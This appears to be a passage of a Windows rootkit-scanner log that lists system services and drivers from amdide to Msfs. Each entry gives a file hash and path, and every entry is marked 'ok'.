23:35:39.0068 5440  amdide - ok
23:35:39.0068 5440  [ 00DDA200D71BAC534BF56A9DB5DFD666 ] AmdK8           C:\Windows\system32\DRIVERS\amdk8.sys
23:35:39.0083 5440  AmdK8 - ok
23:35:39.0083 5440  [ 3CBF30F5370FDA40DD3E87DF38EA53B6 ] AmdPPM          C:\Windows\system32\DRIVERS\amdppm.sys
23:35:39.0099 5440  AmdPPM - ok
23:35:39.0099 5440  [ D320BF87125326F996D4904FE24300FC ] amdsata         C:\Windows\system32\drivers\amdsata.sys
23:35:39.0114 5440  amdsata - ok
23:35:39.0130 5440  [ EA43AF0C423FF267355F74E7A53BDABA ] amdsbs          C:\Windows\system32\DRIVERS\amdsbs.sys
23:35:39.0130 5440  amdsbs - ok
23:35:39.0146 5440  [ 46387FB17B086D16DEA267D5BE23A2F2 ] amdxata         C:\Windows\system32\drivers\amdxata.sys
23:35:39.0146 5440  amdxata - ok
23:35:39.0161 5440  [ 466A0D95960DAD3222C896D2CEA99993 ] AntiVirSchedulerService C:\Program Files\Avira\AntiVir Desktop\sched.exe
23:35:39.0161 5440  AntiVirSchedulerService - ok
23:35:39.0177 5440  [ A489BE6BB0AA1FF406B488B60542314B ] AntiVirService  C:\Program Files\Avira\AntiVir Desktop\avguard.exe
23:35:39.0177 5440  AntiVirService - ok
23:35:39.0177 5440  [ AEA177F783E20150ACE5383EE368DA19 ] AppID           C:\Windows\system32\drivers\appid.sys
23:35:39.0208 5440  AppID - ok
23:35:39.0208 5440  [ 62A9C86CB6085E20DB4823E4E97826F5 ] AppIDSvc        C:\Windows\System32\appidsvc.dll
23:35:39.0239 5440  AppIDSvc - ok
23:35:39.0239 5440  [ FB1959012294D6AD43E5304DF65E3C26 ] Appinfo         C:\Windows\System32\appinfo.dll
23:35:39.0270 5440  Appinfo - ok
23:35:39.0270 5440  [ 2932004F49677BD84DBC72EDB754FFB3 ] arc             C:\Windows\system32\DRIVERS\arc.sys
23:35:39.0286 5440  arc - ok
23:35:39.0286 5440  [ 5D6F36C46FD283AE1B57BD2E9FEB0BC7 ] arcsas          C:\Windows\system32\DRIVERS\arcsas.sys
23:35:39.0302 5440  arcsas - ok
23:35:39.0302 5440  [ 776ACEFA0CA9DF0FAA51A5FB2F435705 ] aspnet_state    C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe
23:35:39.0317 5440  aspnet_state - ok
23:35:39.0317 5440  [ ADD2ADE1C2B285AB8378D2DAAF991481 ] AsyncMac        C:\Windows\system32\DRIVERS\asyncmac.sys
23:35:39.0364 5440  AsyncMac - ok
23:35:39.0364 5440  [ 338C86357871C167A96AB976519BF59E ] atapi           C:\Windows\system32\drivers\atapi.sys
23:35:39.0380 5440  atapi - ok
23:35:39.0395 5440  [ CE3B4E731638D2EF62FCB419BE0D39F0 ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll
23:35:39.0426 5440  AudioEndpointBuilder - ok
23:35:39.0426 5440  [ CE3B4E731638D2EF62FCB419BE0D39F0 ] Audiosrv        C:\Windows\System32\Audiosrv.dll
23:35:39.0458 5440  Audiosrv - ok
23:35:39.0458 5440  [ D5541F0AFB767E85FC412FC609D96A74 ] avgntflt        C:\Windows\system32\DRIVERS\avgntflt.sys
23:35:39.0473 5440  avgntflt - ok
23:35:39.0473 5440  [ 7D967A682D4694DF7FA57D63A2DB01FE ] avipbb          C:\Windows\system32\DRIVERS\avipbb.sys
23:35:39.0489 5440  avipbb - ok
23:35:39.0489 5440  [ 271CFD1A989209B1964E24D969552BF7 ] avkmgr          C:\Windows\system32\DRIVERS\avkmgr.sys
23:35:39.0504 5440  avkmgr - ok
23:35:39.0504 5440  [ 6E30D02AAC9CAC84F421622E3A2F6178 ] AxInstSV        C:\Windows\System32\AxInstSV.dll
23:35:39.0536 5440  AxInstSV - ok
23:35:39.0536 5440  [ 1A231ABEC60FD316EC54C66715543CEC ] b06bdrv         C:\Windows\system32\DRIVERS\bxvbdx.sys
23:35:39.0551 5440  b06bdrv - ok
23:35:39.0567 5440  [ BD8869EB9CDE6BBE4508D869929869EE ] b57nd60x        C:\Windows\system32\DRIVERS\b57nd60x.sys
23:35:39.0582 5440  b57nd60x - ok
23:35:39.0629 5440  [ FC2698F7F72D72B98F0A029E1526AD20 ] BCM43XX         C:\Windows\system32\DRIVERS\bcmwl6.sys
23:35:39.0707 5440  BCM43XX - ok
23:35:39.0723 5440  [ EE1E9C3BB8228AE423DD38DB69128E71 ] BDESVC          C:\Windows\System32\bdesvc.dll
23:35:39.0738 5440  BDESVC - ok
23:35:39.0738 5440  [ 505506526A9D467307B3C393DEDAF858 ] Beep            C:\Windows\system32\drivers\Beep.sys
23:35:39.0770 5440  Beep - ok
23:35:39.0770 5440  [ 1E2BAC209D184BB851E1A187D8A29136 ] BFE             C:\Windows\System32\bfe.dll
23:35:39.0801 5440  BFE - ok
23:35:39.0816 5440  [ E585445D5021971FAE10393F0F1C3961 ] BITS            C:\Windows\System32\qmgr.dll
23:35:39.0848 5440  BITS - ok
23:35:39.0848 5440  [ 2287078ED48FCFC477B05B20CF38F36F ] blbdrive        C:\Windows\system32\DRIVERS\blbdrive.sys
23:35:39.0863 5440  blbdrive - ok
23:35:39.0863 5440  [ 8F2DA3028D5FCBD1A060A3DE64CD6506 ] bowser          C:\Windows\system32\DRIVERS\bowser.sys
23:35:39.0879 5440  bowser - ok
23:35:39.0894 5440  [ 9F9ACC7F7CCDE8A15C282D3F88B43309 ] BrFiltLo        C:\Windows\system32\DRIVERS\BrFiltLo.sys
23:35:39.0894 5440  BrFiltLo - ok
23:35:39.0910 5440  [ 56801AD62213A41F6497F96DEE83755A ] BrFiltUp        C:\Windows\system32\DRIVERS\BrFiltUp.sys
23:35:39.0926 5440  BrFiltUp - ok
23:35:39.0926 5440  [ 3DAA727B5B0A45039B0E1C9A211B8400 ] Browser         C:\Windows\System32\browser.dll
23:35:39.0941 5440  Browser - ok
23:35:39.0941 5440  [ 845B8CE732E67F3B4133164868C666EA ] Brserid         C:\Windows\System32\Drivers\Brserid.sys
23:35:39.0957 5440  Brserid - ok
23:35:39.0972 5440  [ 203F0B1E73ADADBBB7B7B1FABD901F6B ] BrSerWdm        C:\Windows\System32\Drivers\BrSerWdm.sys
23:35:39.0988 5440  BrSerWdm - ok
23:35:39.0988 5440  [ BD456606156BA17E60A04E18016AE54B ] BrUsbMdm        C:\Windows\System32\Drivers\BrUsbMdm.sys
23:35:40.0004 5440  BrUsbMdm - ok
23:35:40.0004 5440  [ AF72ED54503F717A43268B3CC5FAEC2E ] BrUsbSer        C:\Windows\System32\Drivers\BrUsbSer.sys
23:35:40.0019 5440  BrUsbSer - ok
23:35:40.0019 5440  [ ED3DF7C56CE0084EB2034432FC56565A ] BTHMODEM        C:\Windows\system32\DRIVERS\bthmodem.sys
23:35:40.0035 5440  BTHMODEM - ok
23:35:40.0050 5440  [ 1DF19C96EEF6C29D1C3E1A8678E07190 ] bthserv         C:\Windows\system32\bthserv.dll
23:35:40.0082 5440  bthserv - ok
23:35:40.0082 5440  [ 77EA11B065E0A8AB902D78145CA51E10 ] cdfs            C:\Windows\system32\DRIVERS\cdfs.sys
23:35:40.0113 5440  cdfs - ok
23:35:40.0113 5440  [ BE167ED0FDB9C1FA1133953C18D5A6C9 ] cdrom           C:\Windows\system32\DRIVERS\cdrom.sys
23:35:40.0128 5440  cdrom - ok
23:35:40.0128 5440  [ 319C6B309773D063541D01DF8AC6F55F ] CertPropSvc     C:\Windows\System32\certprop.dll
23:35:40.0160 5440  CertPropSvc - ok
23:35:40.0160 5440  [ 3FE3FE94A34DF6FB06E6418D0F6A0060 ] circlass        C:\Windows\system32\DRIVERS\circlass.sys
23:35:40.0175 5440  circlass - ok
23:35:40.0175 5440  [ 635181E0E9BBF16871BF5380D71DB02D ] CLFS            C:\Windows\system32\CLFS.sys
23:35:40.0191 5440  CLFS - ok
23:35:40.0191 5440  [ D88040F816FDA31C3B466F0FA0918F29 ] clr_optimization_v2.0.50727_32 C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
23:35:40.0206 5440  clr_optimization_v2.0.50727_32 - ok
23:35:40.0206 5440  [ C5A75EB48E2344ABDC162BDA79E16841 ] clr_optimization_v4.0.30319_32 C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
23:35:40.0222 5440  clr_optimization_v4.0.30319_32 - ok
23:35:40.0222 5440  [ DEA805815E587DAD1DD2C502220B5616 ] CmBatt          C:\Windows\system32\DRIVERS\CmBatt.sys
23:35:40.0238 5440  CmBatt - ok
23:35:40.0238 5440  [ C537B1DB64D495B9B4717B4D6D9EDBF2 ] cmdide          C:\Windows\system32\drivers\cmdide.sys
23:35:40.0253 5440  cmdide - ok
23:35:40.0253 5440  [ 42F158036BD4C2FF3122BF142E60E6FD ] CNG             C:\Windows\system32\Drivers\cng.sys
23:35:40.0269 5440  CNG - ok
23:35:40.0284 5440  [ A6023D3823C37043986713F118A89BEE ] Compbatt        C:\Windows\system32\DRIVERS\compbatt.sys
23:35:40.0284 5440  Compbatt - ok
23:35:40.0300 5440  [ CBE8C58A8579CFE5FCCF809E6F114E89 ] CompositeBus    C:\Windows\system32\drivers\CompositeBus.sys
23:35:40.0300 5440  CompositeBus - ok
23:35:40.0316 5440  COMSysApp - ok
23:35:40.0316 5440  [ 2C4EBCFC84A9B44F209DFF6C6E6C61D1 ] crcdisk         C:\Windows\system32\DRIVERS\crcdisk.sys
23:35:40.0331 5440  crcdisk - ok
23:35:40.0331 5440  [ 96C0E38905CFD788313BE8E11DAE3F2F ] CryptSvc        C:\Windows\system32\cryptsvc.dll
23:35:40.0347 5440  CryptSvc - ok
23:35:40.0362 5440  [ 7660F01D3B38ACA1747E397D21D790AF ] DcomLaunch      C:\Windows\system32\rpcss.dll
23:35:40.0394 5440  DcomLaunch - ok
23:35:40.0394 5440  [ 8D6E10A2D9A5EED59562D9B82CF804E1 ] defragsvc       C:\Windows\System32\defragsvc.dll
23:35:40.0425 5440  defragsvc - ok
23:35:40.0425 5440  [ F024449C97EC1E464AAFFDA18593DB88 ] DfsC            C:\Windows\system32\Drivers\dfsc.sys
23:35:40.0456 5440  DfsC - ok
23:35:40.0456 5440  [ 73FC5BC52572084EC1241514CF6230A0 ] dg_ssudbus      C:\Windows\system32\DRIVERS\ssudbus.sys
23:35:40.0472 5440  dg_ssudbus - ok
23:35:40.0472 5440  [ E9E01EB683C132F7FA27CD607B8A2B63 ] Dhcp            C:\Windows\system32\dhcpcore.dll
23:35:40.0487 5440  Dhcp - ok
23:35:40.0503 5440  [ 1A050B0274BFB3890703D490F330C0DA ] discache        C:\Windows\system32\drivers\discache.sys
23:35:40.0534 5440  discache - ok
23:35:40.0534 5440  [ 565003F326F99802E68CA78F2A68E9FF ] Disk            C:\Windows\system32\DRIVERS\disk.sys
23:35:40.0534 5440  Disk - ok
23:35:40.0550 5440  [ 33EF4861F19A0736B11314AAD9AE28D0 ] Dnscache        C:\Windows\System32\dnsrslvr.dll
23:35:40.0565 5440  Dnscache - ok
23:35:40.0565 5440  [ 366BA8FB4B7BB7435E3B9EACB3843F67 ] dot3svc         C:\Windows\System32\dot3svc.dll
23:35:40.0596 5440  dot3svc - ok
23:35:40.0596 5440  [ 8EC04CA86F1D68DA9E11952EB85973D6 ] DPS             C:\Windows\system32\dps.dll
23:35:40.0628 5440  DPS - ok
23:35:40.0628 5440  [ B918E7C5F9BF77202F89E1A9539F2EB4 ] drmkaud         C:\Windows\system32\drivers\drmkaud.sys
23:35:40.0643 5440  drmkaud - ok
23:35:40.0659 5440  [ 23F5D28378A160352BA8F817BD8C71CB ] DXGKrnl         C:\Windows\System32\drivers\dxgkrnl.sys
23:35:40.0674 5440  DXGKrnl - ok
23:35:40.0674 5440  EagleXNt - ok
23:35:40.0690 5440  [ 8600142FA91C1B96367D3300AD0F3F3A ] EapHost         C:\Windows\System32\eapsvc.dll
23:35:40.0706 5440  EapHost - ok
23:35:40.0752 5440  [ 024E1B5CAC09731E4D868E64DBFB4AB0 ] ebdrv           C:\Windows\system32\DRIVERS\evbdx.sys
23:35:40.0799 5440  ebdrv - ok
23:35:40.0799 5440  [ 81951F51E318AECC2D68559E47485CC4 ] EFS             C:\Windows\System32\lsass.exe
23:35:40.0830 5440  EFS - ok
23:35:40.0830 5440  [ 0ED67910C8C326796FAA00B2BF6D9D3C ] elxstor         C:\Windows\system32\DRIVERS\elxstor.sys
23:35:40.0846 5440  elxstor - ok
23:35:40.0862 5440  [ 8FC3208352DD3912C94367A206AB3F11 ] ErrDev          C:\Windows\system32\drivers\errdev.sys
23:35:40.0877 5440  ErrDev - ok
23:35:40.0877 5440  [ F6916EFC29D9953D5D0DF06882AE8E16 ] EventSystem     C:\Windows\system32\es.dll
23:35:40.0908 5440  EventSystem - ok
23:35:40.0908 5440  [ 2DC9108D74081149CC8B651D3A26207F ] exfat           C:\Windows\system32\drivers\exfat.sys
23:35:40.0940 5440  exfat - ok
23:35:40.0955 5440  [ 7E0AB74553476622FB6AE36F73D97D35 ] fastfat         C:\Windows\system32\drivers\fastfat.sys
23:35:40.0986 5440  fastfat - ok
23:35:40.0986 5440  [ 967EA5B213E9984CBE270205DF37755B ] Fax             C:\Windows\system32\fxssvc.exe
23:35:41.0018 5440  Fax - ok
23:35:41.0018 5440  [ E817A017F82DF2A1F8CFDBDA29388B29 ] fdc             C:\Windows\system32\DRIVERS\fdc.sys
23:35:41.0033 5440  fdc - ok
23:35:41.0033 5440  [ F3222C893BD2F5821A0179E5C71E88FB ] fdPHost         C:\Windows\system32\fdPHost.dll
23:35:41.0064 5440  fdPHost - ok
23:35:41.0064 5440  [ 7DBE8CBFE79EFBDEB98C9FB08D3A9A5B ] FDResPub        C:\Windows\system32\fdrespub.dll
23:35:41.0096 5440  FDResPub - ok
23:35:41.0096 5440  [ 6CF00369C97F3CF563BE99BE983D13D8 ] FileInfo        C:\Windows\system32\drivers\fileinfo.sys
23:35:41.0111 5440  FileInfo - ok
23:35:41.0111 5440  [ 42C51DC94C91DA21CB9196EB64C45DB9 ] Filetrace       C:\Windows\system32\drivers\filetrace.sys
23:35:41.0142 5440  Filetrace - ok
23:35:41.0158 5440  [ ACEFEEA621DCA62EFB7A7EEA59F5E91B ] FLEXnet Licensing Service C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
23:35:41.0189 5440  FLEXnet Licensing Service - ok
23:35:41.0189 5440  [ 87907AA70CB3C56600F1C2FB8841579B ] flpydisk        C:\Windows\system32\DRIVERS\flpydisk.sys
23:35:41.0205 5440  flpydisk - ok
23:35:41.0205 5440  [ 7520EC808E0C35E0EE6F841294316653 ] FltMgr          C:\Windows\system32\drivers\fltmgr.sys
23:35:41.0220 5440  FltMgr - ok
23:35:41.0236 5440  [ E12C4928B32ACE04610259647F072635 ] FontCache       C:\Windows\system32\FntCache.dll
23:35:41.0267 5440  FontCache - ok
23:35:41.0267 5440  [ E56F39F6B7FDA0AC77A79B0FD3DE1A2F ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
23:35:41.0283 5440  FontCache3.0.0.0 - ok
23:35:41.0283 5440  [ 1A16B57943853E598CFF37FE2B8CBF1D ] FsDepends       C:\Windows\system32\drivers\FsDepends.sys
23:35:41.0298 5440  FsDepends - ok
23:35:41.0298 5440  [ 7DAE5EBCC80E45D3253F4923DC424D05 ] Fs_Rec          C:\Windows\system32\drivers\Fs_Rec.sys
23:35:41.0314 5440  Fs_Rec - ok
23:35:41.0314 5440  [ E306A24D9694C724FA2491278BF50FDB ] fvevol          C:\Windows\system32\DRIVERS\fvevol.sys
23:35:41.0330 5440  fvevol - ok
23:35:41.0330 5440  [ 65EE0C7A58B65E74AE05637418153938 ] gagp30kx        C:\Windows\system32\DRIVERS\gagp30kx.sys
23:35:41.0345 5440  gagp30kx - ok
23:35:41.0345 5440  [ 185ADA973B5020655CEE342059A86CBB ] GEARAspiWDM     C:\Windows\system32\DRIVERS\GEARAspiWDM.sys
23:35:41.0361 5440  GEARAspiWDM - ok
23:35:41.0361 5440  [ E897EAF5ED6BA41E081060C9B447A673 ] gpsvc           C:\Windows\System32\gpsvc.dll
23:35:41.0408 5440  gpsvc - ok
23:35:41.0408 5440  [ 3D6F9920F74FF2BD81EBAAAA7247969C ] hardlock        C:\Windows\system32\drivers\hardlock.sys
23:35:41.0439 5440  hardlock - ok
23:35:41.0439 5440  hasplms - ok
23:35:41.0439 5440  [ C44E3C2BAB6837DB337DDEE7544736DB ] hcw85cir        C:\Windows\system32\drivers\hcw85cir.sys
23:35:41.0454 5440  hcw85cir - ok
23:35:41.0470 5440  [ A5EF29D5315111C80A5C1ABAD14C8972 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
23:35:41.0486 5440  HdAudAddService - ok
23:35:41.0486 5440  [ 9036377B8A6C15DC2EEC53E489D159B5 ] HDAudBus        C:\Windows\system32\DRIVERS\HDAudBus.sys
23:35:41.0501 5440  HDAudBus - ok
23:35:41.0501 5440  [ A88485DC6A7136C10D9A6C7E38FDFE3C ] HECI            C:\Windows\system32\DRIVERS\HECI.sys
23:35:41.0517 5440  HECI - ok
23:35:41.0517 5440  [ 1D58A7F3E11A9731D0EAAAA8405ACC36 ] HidBatt         C:\Windows\system32\DRIVERS\HidBatt.sys
23:35:41.0532 5440  HidBatt - ok
23:35:41.0532 5440  [ 89448F40E6DF260C206A193A4683BA78 ] HidBth          C:\Windows\system32\DRIVERS\hidbth.sys
23:35:41.0548 5440  HidBth - ok
23:35:41.0548 5440  [ CF50B4CF4A4F229B9F3C08351F99CA5E ] HidIr           C:\Windows\system32\DRIVERS\hidir.sys
23:35:41.0564 5440  HidIr - ok
23:35:41.0564 5440  [ 2BC6F6A1992B3A77F5F41432CA6B3B6B ] hidserv         C:\Windows\system32\hidserv.dll
23:35:41.0595 5440  hidserv - ok
23:35:41.0595 5440  [ 10C19F8290891AF023EAEC0832E1EB4D ] HidUsb          C:\Windows\system32\DRIVERS\hidusb.sys
23:35:41.0610 5440  HidUsb - ok
23:35:41.0610 5440  [ 196B4E3F4CCCC24AF836CE58FACBB699 ] hkmsvc          C:\Windows\system32\kmsvc.dll
23:35:41.0642 5440  hkmsvc - ok
23:35:41.0642 5440  [ 6658F4404DE03D75FE3BA09F7ABA6A30 ] HomeGroupListener C:\Windows\system32\ListSvc.dll
23:35:41.0657 5440  HomeGroupListener - ok
23:35:41.0673 5440  [ DBC02D918FFF1CAD628ACBE0C0EAA8E8 ] HomeGroupProvider C:\Windows\system32\provsvc.dll
23:35:41.0688 5440  HomeGroupProvider - ok
23:35:41.0688 5440  [ 295FDC419039090EB8B49FFDBB374549 ] HpSAMD          C:\Windows\system32\drivers\HpSAMD.sys
23:35:41.0704 5440  HpSAMD - ok
23:35:41.0704 5440  [ 871917B07A141BFF43D76D8844D48106 ] HTTP            C:\Windows\system32\drivers\HTTP.sys
23:35:41.0735 5440  HTTP - ok
23:35:41.0751 5440  [ 0C4E035C7F105F1299258C90886C64C5 ] hwpolicy        C:\Windows\system32\drivers\hwpolicy.sys
23:35:41.0751 5440  hwpolicy - ok
23:35:41.0766 5440  [ F151F0BDC47F4A28B1B20A0818EA36D6 ] i8042prt        C:\Windows\system32\DRIVERS\i8042prt.sys
23:35:41.0766 5440  i8042prt - ok
23:35:41.0782 5440  [ CDF6179EC9129E9ABC5B0F0525B159EB ] iaStor          C:\Windows\system32\DRIVERS\iaStor.sys
23:35:41.0798 5440  iaStor - ok
23:35:41.0798 5440  [ 5CD5F9A5444E6CDCB0AC89BD62D8B76E ] iaStorV         C:\Windows\system32\drivers\iaStorV.sys
23:35:41.0813 5440  iaStorV - ok
23:35:41.0829 5440  [ C521D7EB6497BB1AF6AFA89E322FB43C ] idsvc           C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
23:35:41.0844 5440  idsvc - ok
23:35:41.0938 5440  [ 8266AE06DF974E5BA047B3E9E9E70B3F ] igfx            C:\Windows\system32\DRIVERS\igdkmd32.sys
23:35:42.0110 5440  igfx - ok
23:35:42.0125 5440  [ 4173FF5708F3236CF25195FECD742915 ] iirsp           C:\Windows\system32\DRIVERS\iirsp.sys
23:35:42.0141 5440  iirsp - ok
23:35:42.0156 5440  [ F95622F161474511B8D80D6B093AA610 ] IKEEXT          C:\Windows\System32\ikeext.dll
23:35:42.0188 5440  IKEEXT - ok
23:35:42.0188 5440  [ E3C36AC5AE87EC970AE8EA2A93D59AE1 ] Impcd           C:\Windows\system32\DRIVERS\Impcd.sys
23:35:42.0203 5440  Impcd - ok
23:35:42.0203 5440  [ A0F12F2C9BA6C72F3987CE780E77C130 ] intelide        C:\Windows\system32\drivers\intelide.sys
23:35:42.0219 5440  intelide - ok
23:35:42.0219 5440  [ 3B514D27BFC4ACCB4037BC6685F766E0 ] intelppm        C:\Windows\system32\DRIVERS\intelppm.sys
23:35:42.0234 5440  intelppm - ok
23:35:42.0234 5440  [ ACB364B9075A45C0736E5C47BE5CAE19 ] IPBusEnum       C:\Windows\system32\ipbusenum.dll
23:35:42.0266 5440  IPBusEnum - ok
23:35:42.0266 5440  [ 709D1761D3B19A932FF0238EA6D50200 ] IpFilterDriver  C:\Windows\system32\DRIVERS\ipfltdrv.sys
23:35:42.0297 5440  IpFilterDriver - ok
23:35:42.0297 5440  [ 58F67245D041FBE7AF88F4EAF79DF0FA ] iphlpsvc        C:\Windows\System32\iphlpsvc.dll
23:35:42.0328 5440  iphlpsvc - ok
23:35:42.0328 5440  [ 4BD7134618C1D2A27466A099062547BF ] IPMIDRV         C:\Windows\system32\drivers\IPMIDrv.sys
23:35:42.0344 5440  IPMIDRV - ok
23:35:42.0344 5440  [ A5FA468D67ABCDAA36264E463A7BB0CD ] IPNAT           C:\Windows\system32\drivers\ipnat.sys
23:35:42.0375 5440  IPNAT - ok
23:35:42.0390 5440  [ E46B17060D3962A384AE484094614788 ] iPod Service    C:\Program Files\iPod\bin\iPodService.exe
23:35:42.0406 5440  iPod Service - ok
23:35:42.0406 5440  [ 42996CFF20A3084A56017B7902307E9F ] IRENUM          C:\Windows\system32\drivers\irenum.sys
23:35:42.0422 5440  IRENUM - ok
23:35:42.0422 5440  [ 1F32BB6B38F62F7DF1A7AB7292638A35 ] isapnp          C:\Windows\system32\drivers\isapnp.sys
23:35:42.0437 5440  isapnp - ok
23:35:42.0437 5440  [ CB7A9ABB12B8415BCE5D74994C7BA3AE ] iScsiPrt        C:\Windows\system32\drivers\msiscsi.sys
23:35:42.0453 5440  iScsiPrt - ok
23:35:42.0453 5440  [ ADEF52CA1AEAE82B50DF86B56413107E ] kbdclass        C:\Windows\system32\DRIVERS\kbdclass.sys
23:35:42.0468 5440  kbdclass - ok
23:35:42.0468 5440  [ 9E3CED91863E6EE98C24794D05E27A71 ] kbdhid          C:\Windows\system32\DRIVERS\kbdhid.sys
23:35:42.0484 5440  kbdhid - ok
23:35:42.0484 5440  [ 81951F51E318AECC2D68559E47485CC4 ] KeyIso          C:\Windows\system32\lsass.exe
23:35:42.0500 5440  KeyIso - ok
23:35:42.0500 5440  [ B7895B4182C0D16F6EFADEB8081E8D36 ] KSecDD          C:\Windows\system32\Drivers\ksecdd.sys
23:35:42.0515 5440  KSecDD - ok
23:35:42.0515 5440  [ 5FE1ABF1AF591A3458C9CF24ED9A4D35 ] KSecPkg         C:\Windows\system32\Drivers\ksecpkg.sys
23:35:42.0531 5440  KSecPkg - ok
23:35:42.0531 5440  [ 89A7B9CC98D0D80C6F31B91C0A310FCD ] KtmRm           C:\Windows\system32\msdtckrm.dll
23:35:42.0562 5440  KtmRm - ok
23:35:42.0578 5440  [ D64AF876D53ECA3668BB97B51B4E70AB ] LanmanServer    C:\Windows\system32\srvsvc.dll
23:35:42.0593 5440  LanmanServer - ok
23:35:42.0609 5440  [ 58405E4F68BA8E4057C6E914F326ABA2 ] LanmanWorkstation C:\Windows\System32\wkssvc.dll
23:35:42.0624 5440  LanmanWorkstation - ok
23:35:42.0640 5440  [ 01CC7FB6E790EF044B411377F3A1FF41 ] LHidFilt        C:\Windows\system32\DRIVERS\LHidFilt.Sys
23:35:42.0640 5440  LHidFilt - ok
23:35:42.0640 5440  [ F7611EC07349979DA9B0AE1F18CCC7A6 ] lltdio          C:\Windows\system32\DRIVERS\lltdio.sys
23:35:42.0671 5440  lltdio - ok
23:35:42.0687 5440  [ 5700673E13A2117FA3B9020C852C01E2 ] lltdsvc         C:\Windows\System32\lltdsvc.dll
23:35:42.0702 5440  lltdsvc - ok
23:35:42.0718 5440  [ 55CA01BA19D0006C8F2639B6C045E08B ] lmhosts         C:\Windows\System32\lmhsvc.dll
23:35:42.0734 5440  lmhosts - ok
23:35:42.0734 5440  [ A2E7EAE8898D7B4B8C302B8F4E836BB5 ] LMouFilt        C:\Windows\system32\DRIVERS\LMouFilt.Sys
23:35:42.0749 5440  LMouFilt - ok
23:35:42.0749 5440  [ EB119A53CCF2ACC000AC71B065B78FEF ] LSI_FC          C:\Windows\system32\DRIVERS\lsi_fc.sys
23:35:42.0765 5440  LSI_FC - ok
23:35:42.0765 5440  [ 8ADE1C877256A22E49B75D1CC9161F9C ] LSI_SAS         C:\Windows\system32\DRIVERS\lsi_sas.sys
23:35:42.0780 5440  LSI_SAS - ok
23:35:42.0780 5440  [ DC9DC3D3DAA0E276FD2EC262E38B11E9 ] LSI_SAS2        C:\Windows\system32\DRIVERS\lsi_sas2.sys
23:35:42.0796 5440  LSI_SAS2 - ok
23:35:42.0796 5440  [ 0A036C7D7CAB643A7F07135AC47E0524 ] LSI_SCSI        C:\Windows\system32\DRIVERS\lsi_scsi.sys
23:35:42.0812 5440  LSI_SCSI - ok
23:35:42.0812 5440  [ 6703E366CC18D3B6E534F5CF7DF39CEE ] luafv           C:\Windows\system32\drivers\luafv.sys
23:35:42.0843 5440  luafv - ok
23:35:42.0843 5440  [ DDFA88E36D5F8DB5FBDBDDDC4969DB0A ] LUsbFilt        C:\Windows\system32\Drivers\LUsbFilt.Sys
23:35:42.0858 5440  LUsbFilt - ok
23:35:42.0858 5440  [ 0FFF5B045293002AB38EB1FD1FC2FB74 ] megasas         C:\Windows\system32\DRIVERS\megasas.sys
23:35:42.0874 5440  megasas - ok
23:35:42.0874 5440  [ DCBAB2920C75F390CAF1D29F675D03D6 ] MegaSR          C:\Windows\system32\DRIVERS\MegaSR.sys
23:35:42.0890 5440  MegaSR - ok
23:35:42.0890 5440  [ 146B6F43A673379A3C670E86D89BE5EA ] MMCSS           C:\Windows\system32\mmcss.dll
23:35:42.0921 5440  MMCSS - ok
23:35:42.0921 5440  [ F001861E5700EE84E2D4E52C712F4964 ] Modem           C:\Windows\system32\drivers\modem.sys
23:35:42.0952 5440  Modem - ok
23:35:42.0952 5440  [ 79D10964DE86B292320E9DFE02282A23 ] monitor         C:\Windows\system32\DRIVERS\monitor.sys
23:35:42.0968 5440  monitor - ok
23:35:42.0968 5440  [ FB18CC1D4C2E716B6B903B0AC0CC0609 ] mouclass        C:\Windows\system32\DRIVERS\mouclass.sys
23:35:42.0983 5440  mouclass - ok
23:35:42.0983 5440  [ 2C388D2CD01C9042596CF3C8F3C7B24D ] mouhid          C:\Windows\system32\DRIVERS\mouhid.sys
23:35:42.0999 5440  mouhid - ok
23:35:42.0999 5440  [ FC8771F45ECCCFD89684E38842539B9B ] mountmgr        C:\Windows\system32\drivers\mountmgr.sys
23:35:43.0014 5440  mountmgr - ok
23:35:43.0014 5440  [ 7EDBBB9351A38C6BB0FE98CFD44DB430 ] MozillaMaintenance C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe
23:35:43.0030 5440  MozillaMaintenance - ok
23:35:43.0030 5440  [ 2D699FB6E89CE0D8DA14ECC03B3EDFE0 ] mpio            C:\Windows\system32\drivers\mpio.sys
23:35:43.0046 5440  mpio - ok
23:35:43.0046 5440  [ AD2723A7B53DD1AACAE6AD8C0BFBF4D0 ] mpsdrv          C:\Windows\system32\drivers\mpsdrv.sys
23:35:43.0077 5440  mpsdrv - ok
23:35:43.0077 5440  [ 9835584E999D25004E1EE8E5F3E3B881 ] MpsSvc          C:\Windows\system32\mpssvc.dll
23:35:43.0108 5440  MpsSvc - ok
23:35:43.0124 5440  [ CEB46AB7C01C9F825F8CC6BABC18166A ] MRxDAV          C:\Windows\system32\drivers\mrxdav.sys
23:35:43.0139 5440  MRxDAV - ok
23:35:43.0139 5440  [ 5D16C921E3671636C0EBA3BBAAC5FD25 ] mrxsmb          C:\Windows\system32\DRIVERS\mrxsmb.sys
23:35:43.0155 5440  mrxsmb - ok
23:35:43.0170 5440  [ 6D17A4791ACA19328C685D256349FEFC ] mrxsmb10        C:\Windows\system32\DRIVERS\mrxsmb10.sys
23:35:43.0170 5440  mrxsmb10 - ok
23:35:43.0186 5440  [ B81F204D146000BE76651A50670A5E9E ] mrxsmb20        C:\Windows\system32\DRIVERS\mrxsmb20.sys
23:35:43.0186 5440  mrxsmb20 - ok
23:35:43.0202 5440  [ 012C5F4E9349E711E11E0F19A8589F0A ] msahci          C:\Windows\system32\drivers\msahci.sys
23:35:43.0202 5440  msahci - ok
23:35:43.0217 5440  [ 55055F8AD8BE27A64C831322A780A228 ] msdsm           C:\Windows\system32\drivers\msdsm.sys
23:35:43.0217 5440  msdsm - ok
23:35:43.0233 5440  [ E1BCE74A3BD9902B72599C0192A07E27 ] MSDTC           C:\Windows\System32\msdtc.exe
23:35:43.0248 5440  MSDTC - ok
23:35:43.0248 5440  [ DAEFB28E3AF5A76ABCC2C3078C07327F ] Msfs            C:\Windows\system32\drivers\Msfs.sys
23:35:43.0280 5440  Msfs - ok
